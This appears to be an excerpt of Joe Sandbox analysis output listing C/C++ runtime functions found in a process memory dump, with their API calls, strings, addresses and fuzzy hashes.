Opcode Fuzzy Hash: 6a4625ffe0868079c268eb8d2ec575f20adfcd32afa057862175ab62ba7ff462
Instruction Fuzzy Hash: 82F0E53A70020957CB0AAF39D84576ABFD4EFC1751F074058EA0A8F291C672AA82C790

Function 0033F21C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0033A4BC,?,20001004,00000000,00000002,?,?,003393CE), ref: 0033F250

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6f249779999e979c826d236cafa5533eceb06329f49185d6b0bf03cce8cc9371
Instruction ID: c7657e932d988571d8330aa3c1e9822c86407789d580c335b87b32bf457eeca8
Opcode Fuzzy Hash: 6f249779999e979c826d236cafa5533eceb06329f49185d6b0bf03cce8cc9371
Instruction Fuzzy Hash: 1DE04F7AD00218BFCF132F60DC45AAE7F19EF447A1F404420FD05A5171CB718D20AA95

Function 00335014 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00335019

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a9d8c9ceb31d61c0607f9e215186abc5007fab037753905b915c274eeef4932f
Instruction ID: 150720a30016ef703479e2e7bfb0d37c5782573375781bfe81794a2f3cbc10ab
Opcode Fuzzy Hash: a9d8c9ceb31d61c0607f9e215186abc5007fab037753905b915c274eeef4932f
Instruction Fuzzy Hash:

Function 0033FE2C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0033FE2C

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 262b81d131bc3190079973143a22a4738d8f4678bcc1be6b65ece8f44368756c
Instruction ID: e130da7cdc2fc4920b0d2c97a900e207ca7514afa49bcec4198bdcbebd82fd03
Opcode Fuzzy Hash: 262b81d131bc3190079973143a22a4738d8f4678bcc1be6b65ece8f44368756c
Instruction Fuzzy Hash: EFA011B0A023008B83828F32AA0AB0C3BACAA023C2B088028A000C2030EB208880AF00

Function 0034A222 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(011BFE78,011BFE78,00000000,7FFFFFFF,?,0034A20D,011BFE78,011BFE78,00000000,011BFE78,?,?,?,?,011BFE78,00000000), ref: 0034A2C8
__alloca_probe_16.LIBCMT ref: 0034A383
__alloca_probe_16.LIBCMT ref: 0034A412
__freea.LIBCMT ref: 0034A45D
__freea.LIBCMT ref: 0034A463
__freea.LIBCMT ref: 0034A499
__freea.LIBCMT ref: 0034A49F
__freea.LIBCMT ref: 0034A4AF

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 9342bf08b6835833e686be986175fbbf2b5ca18138bd71bb84c40565ac07cdf3
Instruction ID: 1b669aae874db035082a594098e0e14e9c944b3aebe5aa88a4c3b07b1216b2c9
Opcode Fuzzy Hash: 9342bf08b6835833e686be986175fbbf2b5ca18138bd71bb84c40565ac07cdf3
Instruction Fuzzy Hash: DC710972940A059BDF239F95CC86BAE7BFA9F45310F254055F904AF381E775EC008762

Function 003354C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0033550C
__alloca_probe_16.LIBCMT ref: 00335538
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00335577
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00335594
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003355D3
__alloca_probe_16.LIBCMT ref: 003355F0
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00335632
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00335655

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 2d6090f4e35cc9bea644e97f7837cb1be01a259098b56b2021582b38d4e5d4bb
Instruction ID: abfa828a17a3ed6c2dc31e98d8c080111afcd108d7bb9616df99bbcef8d84323
Opcode Fuzzy Hash: 2d6090f4e35cc9bea644e97f7837cb1be01a259098b56b2021582b38d4e5d4bb
Instruction Fuzzy Hash: 1051A072600606AFEF229F65CC86FBB7BA9EF40751F564425FD05EA1A0DB30DD108B90

Function 003361E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00336217
___except_validate_context_record.LIBVCRUNTIME ref: 0033621F
_ValidateLocalCookies.LIBCMT ref: 003362A8
__IsNonwritableInCurrentImage.LIBCMT ref: 003362D3
_ValidateLocalCookies.LIBCMT ref: 00336328

Strings

csm, xrefs: 003362BD

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
Instruction ID: 492a90b17d630f87328ddbe71ff0b32f88068b793d3a1000196be56b45017db4
Opcode Fuzzy Hash: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
Instruction Fuzzy Hash: B3418234A00218AFCF12DF68C8C6A9EBBB5EF45324F15C555E8149F3A2D771AA05CB91

Function 0033F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0033F578,0033186A,?,00000000,003331E1,0033186C,?,0033F1F6,00000022,FlsSetValue,0034DFE0,8,5,003331E1), ref: 0033F52A

Strings

api-ms-, xrefs: 0033F4C0
ext-ms-, xrefs: 0033F4D4

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
Instruction ID: e1b959f2cc2acb5b0f5f4b34274bd437abd872c1cfbe8009d5e8bbd4da27567b
Opcode Fuzzy Hash: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
Instruction Fuzzy Hash: A1219372E02311AFDB239B65EC85A5B775C9B427A5F650130FD16AB2A0EB30FE00C6D0

Function 0034625D Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565d6e9cb7c00313a68079fd7211992ef4cffa9ded57647442df5de83b06e7b7
Instruction ID: 53dd24b1b9f93867f9708bb4d28659b0ae23d703fc99c2689e0d0c38ff3bf35a
Opcode Fuzzy Hash: 565d6e9cb7c00313a68079fd7211992ef4cffa9ded57647442df5de83b06e7b7
Instruction Fuzzy Hash: A7B11370A04344AFDF13DFA9D892BADBBF8AF46300F154199E5019F3A6C770A941CB62

Function 0033D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0033D2B7,00335FB7,00335179), ref: 0033D2CE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0033D2DC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0033D2F5
SetLastError.KERNEL32(00000000,0033D2B7,00335FB7,00335179), ref: 0033D347

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
Instruction ID: 186b87cd0697e6b1b16b52b73caf29cc05af0c13c614d9aec36e534be79e2a01
Opcode Fuzzy Hash: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
Instruction Fuzzy Hash: 7D01F23620F7259EE7272B74BCC596B2A9CEB017B6F240329F120A90F0EF15BC4492C1

Function 0033DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0033DCA7
CallUnexpected.LIBVCRUNTIME ref: 0033DF20

Strings

csm, xrefs: 0033DCDE
csm, xrefs: 0033DC32
csm, xrefs: 0033DBC5

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
Instruction ID: a6e533bf1190751298d5eda33410eb8d3eca719147cf8e1f8006d7c6fd1b58f6
Opcode Fuzzy Hash: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
Instruction Fuzzy Hash: 61B16971800209EFCF2ADFA4E8C19AEBBB5FF14310F15455AE811AF216D771EA61CB91

Function 00338C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,825BC0CB,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338C8A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00338C9C
FreeLibrary.KERNEL32(00000000,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338CBE

Strings

mscoree.dll, xrefs: 00338C83
CorExitProcess, xrefs: 00338C94

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
Instruction ID: 7f3b41f7e9c422655e46988e701db1a244716b9d93048e04aa8ef38f9b0fc4db
Opcode Fuzzy Hash: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
Instruction Fuzzy Hash: 86016771945755EFDB138B54CC49FEEBBBCFB44B52F000525F811A22E0DB749900CA90

Function 0033FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0033FCC2
__alloca_probe_16.LIBCMT ref: 0033FD8B
__freea.LIBCMT ref: 0033FDF2

Part of subcall function 0033E531: RtlAllocateHeap.NTDLL(00000000,003331E1,0033186A,?,003360C1,0033186C,0033186A,?,?,?,00333181,003331E1,0033186E,0033186A,0033186A,0033186A), ref: 0033E563

__freea.LIBCMT ref: 0033FE05
__freea.LIBCMT ref: 0033FE12

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: adfe9232b77463faea1720595a1aa2fd1f82acaf584dc161fc536f59d9c874c2
Instruction ID: 25080428a21125f59c424ce893c6e0a5bc69529afb6788eddbd93dac9b15c2cc
Opcode Fuzzy Hash: adfe9232b77463faea1720595a1aa2fd1f82acaf584dc161fc536f59d9c874c2
Instruction Fuzzy Hash: E451A672900246AFEF22AF62DCC5EBB7AADEF44710F960539FD04DA151EB34DC5096A0

Function 00333010 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00333017
std::_Lockit::_Lockit.LIBCPMT ref: 00333022
std::_Lockit::~_Lockit.LIBCPMT ref: 00333090

Part of subcall function 00332EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00332EFC

std::locale::_Setgloballocale.LIBCPMT ref: 0033303D
_Yarn.LIBCPMT ref: 00333053

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
Instruction ID: 01f33944cef2dc9be6af8024aa5c5565985df18ff89244a889aed25ca3591d7a
Opcode Fuzzy Hash: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
Instruction Fuzzy Hash: 66018FB6A002249BCB0BEF60D88697D7B75FF85341F154409E8125B3A1DF34AE42CB81

Function 00347E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584), ref: 00347E9F
GetLastError.KERNEL32(?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584,00000000,?,0033E1DC), ref: 00347EA9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00347ED1

Strings

api-ms-, xrefs: 00347EB6

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
Instruction ID: 987a0315bf1dc2fd44ee6a9f40c565b39edb45184c46b2b5de10bc2f7845544a
Opcode Fuzzy Hash: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
Instruction Fuzzy Hash: A1E04870284309B7DB131B61DC06F593B9DDB10B91F104060FE0DBC4F1D761AD9096C4

Function 0034562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(825BC0CB,00000000,00000000,?), ref: 00345690

Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003458E2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00345928
GetLastError.KERNEL32 ref: 003459CB

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
Instruction ID: ff26c1c1485af013368e001f5bc4d6890e98318e58dc556e4815fb2025fb6a12
Opcode Fuzzy Hash: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
Instruction Fuzzy Hash: 4AD16B75E04648DFCB16CFA8D8809ADBBF9FF49310F24452AE456EB352D730A946CB50

Function 0033D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0033D976
___AdjustPointer.LIBCMT ref: 0033D999
___AdjustPointer.LIBCMT ref: 0033DA35

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
